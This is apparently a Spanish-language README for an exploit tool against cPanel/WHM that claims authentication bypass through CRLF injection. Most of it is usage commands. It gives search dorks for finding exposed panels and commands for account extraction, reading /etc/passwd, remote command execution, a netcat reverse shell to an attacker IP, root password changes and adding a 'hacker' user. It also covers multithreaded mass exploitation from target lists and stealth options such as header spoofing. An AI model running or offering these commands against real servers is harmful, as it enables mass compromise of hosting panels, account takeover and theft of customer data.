
🚀 CVE-2026-41940 Exploit de Bypass de Autenticación de cPanel/WHM - Mejor Flujo 💥 La inyección CRLF provoca bypass de autenticación, secuestro de sesión y fuga de cuentas. ✅ Proxy, UA personalizado, keep-alive, reintentos, verificación SSL, salida con colores, soporte de guardado en archivo. ⚡ PoC avanzado para pentesters.

Edición cPanel & WHM - Inyección CRLF para Bypass de Autenticación y Secuestro Total de Sesión
Este exploit aprovecha CVE-2026-41940, una vulnerabilidad crítica de bypass de autenticación en cPanel/WHM. Al inyectar una carga útil CRLF manipulada en el sistema de gestión de sesiones, logra el secuestro de sesión, acceso root y control total sobre el panel de hosting sin necesidad de credenciales válidas.
port:2087 "cPanel" "WHM"
port:2083 "cPanel"
⚠️ Aviso legal: Esta herramienta es solo para pruebas de seguridad autorizadas y fines educativos. El acceso no autorizado es ilegal.
# Clone the repository
git clone https://github.com/tc4dy/CVE-2026-41940-POC-Exploit
cd CVE-2026-41940-POC-Exploit
# Install dependencies
pip3 install -r requirements.txt
# Run
python3 exploit.py -t https://example.com:2087
# Basic exploitation (extract accounts)
python3 exploit.py -t https://192.168.1.100:2087
# Save accounts to file
python3 exploit.py -t https://192.168.1.100:2087 -o accounts.txt
# Verbose mode (debug output)
python3 exploit.py -t https://192.168.1.100:2087 -v
# Interactive WHM Shell (Recommended)
python3 exploit.py -t https://192.168.1.100:2087 -i
[email protected] $ accounts # List all cPanel accounts
[email protected] $ version # Show cPanel version
[email protected] $ ls /home # List directory
[email protected] $ cat /etc/passwd # Read file
[email protected] $ exec id # Execute command
[email protected] $ passwd NewPass123 # Change root password
[email protected] $ adduser test test.com pass123 # Create new user
[email protected] $ exit # Exit shell
## 🔧 Ejecución remota de comandos
```bash
# Execute single command
python3 exploit.py -t https://192.168.1.100:2087 --cmd "id"
python3 exploit.py -t https://192.168.1.100:2087 --cmd "cat /etc/passwd"
python3 exploit.py -t https://192.168.1.100:2087 --cmd "whoami; hostname; uname -a"
# Read file
python3 exploit.py -t https://192.168.1.100:2087 --read /etc/passwd
python3 exploit.py -t https://192.168.1.100:2087 --read /home/example/config.php
# Attacker machine (listener)
nc -lvnp 4444
# Exploit (reverse shell)
python3 exploit.py -t https://192.168.1.100:2087 --reverse-shell 10.0.0.1:4444
# Change root password
python3 exploit.py -t https://192.168.1.100:2087 --passwd "NewRootPass123!"
# Create new cPanel user
python3 exploit.py -t https://192.168.1.100:2087 --adduser hacker hacker.com Pass1234
# Keep-alive session (maintain access)
python3 exploit.py -t https://192.168.1.100:2087 --no-keep-alive # Disable auto keep-alive
# Create targets file
echo "https://target1.com:2087" > targets.txt
echo "https://target2.com:2087" >> targets.txt
echo "https://10.0.0.5:2087" >> targets.txt
# Mass exploit with 20 threads
python3 exploit.py -l targets.txt --threads 20
# Mass exploit with command execution
python3 exploit.py -l targets.txt --threads 10 --cmd "id"
# Custom port (non-standard)
python3 exploit.py -t https://example.com -p 8443
# Using proxy
python3 exploit.py -t https://192.168.1.100:2087 --proxy http://127.0.0.1:8080
# Custom user-agent for stealth
python3 exploit.py -t https://192.168.1.100:2087 -ua "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
# Custom delay and retries
python3 exploit.py -t https://192.168.1.100:2087 --delay 5 --max-retries 5
# SSL verification (ignore self-signed by default)
python3 exploit.py -t https://192.168.1.100:2087 --ssl-verify
docker run -d --name cpanel-test -p 2087:2087 cpanel/cpanel:102
docker pull cpanel/cpanel:11.102 docker run -d -p 2087:2087 cpanel/cpanel:11.102
Echa un vistazo a mis otros repositorios de exploits:
| Categoría | Características |
|---|
| Explotación | ✅ Bypass de autenticación mediante inyección CRLF ✅ Secuestro de sesión de WHM ✅ Fuga de tokens de seguridad ✅ Acceso root instantáneo |
| Post-explotación | ✅ Extracción de lista de cuentas (usuario + dominio) ✅ Ejecución remota de comandos (RCE) ✅ Shell inversa (compatible con netcat) ✅ Lectura de archivos (configuraciones, registros, etc.) ✅ Cambio de contraseña de root ✅ Creación de nuevos usuarios de cPanel |
| Escaneo | ✅ Explotación de un solo objetivo ✅ Escaneo masivo de múltiples objetivos ✅ Multihilo (hilos configurables) ✅ Soporte para sobrescribir puerto |
| Sigilo | ✅ Retardos aleatorios entre peticiones ✅ Suplantación de X-Forwarded-For ✅ Soporte de User-Agent personalizado ✅ Soporte de proxy (HTTP/HTTPS) |
| Usabilidad | ✅ Shell interactiva de WHM (-i)✅ Salida con colores (colorama) ✅ Modo verboso/depuración ✅ Exportación de lista de cuentas a archivo ✅ Hilo de sesión keep-alive ✅ Mecanismo de reintentos para conexiones inestables |
| Producto | Versiones | Estado |
|---|
| cPanel & WHM | 11.92 - 11.102 | ✅ Confirmado |
| cPanel & WHM | 11.104 - 11.110 | ✅ Confirmado |
| cPanel & WHM | 11.118 - 11.136 | ⚠️ Limitado |
| cPanel & WHM | < 11.86 | ✅ Posiblemente vulnerable |
| Corto | Largo | Descripción | Predeterminado |
|---|
-t | --target | URL de un solo objetivo | Requerido (individual) |
-l | --target-file | Archivo con la lista de objetivos | Requerido (masivo) |
-p | --port | Sobrescribir puerto | Detección automática |
-o | --output | Guardar lista de cuentas en un archivo | Ninguno |
-v | --verbose | Habilitar salida de depuración | Falso |
-i | --interactive | Shell interactiva de WHM | Falso |
--proxy | Proxy HTTP/HTTPS | Ninguno | |
-ua | --user-agent | User-Agent personalizado | Aleatorio |
--cmd | Ejecutar un solo comando | Ninguno | |
--reverse-shell | Shell inversa IP:PUERTO | Ninguno | |
--passwd | Cambiar contraseña de root | Ninguno | |
--adduser | Crear nuevo usuario (USUARIO DOMINIO CONTRASEÑA) | Ninguno | |
--read | Leer archivo del objetivo | Ninguno | |
--threads | Hilos para escaneo masivo | 10 | |
--delay | Intervalo de keep-alive (segundos) | 3.0 | |
--max-retries | Reintentos máximos por petición | 3 | |
--no-keep-alive | No mantener la sesión | Falso | |
--ssl-verify | Verificar certificados SSL | Falso |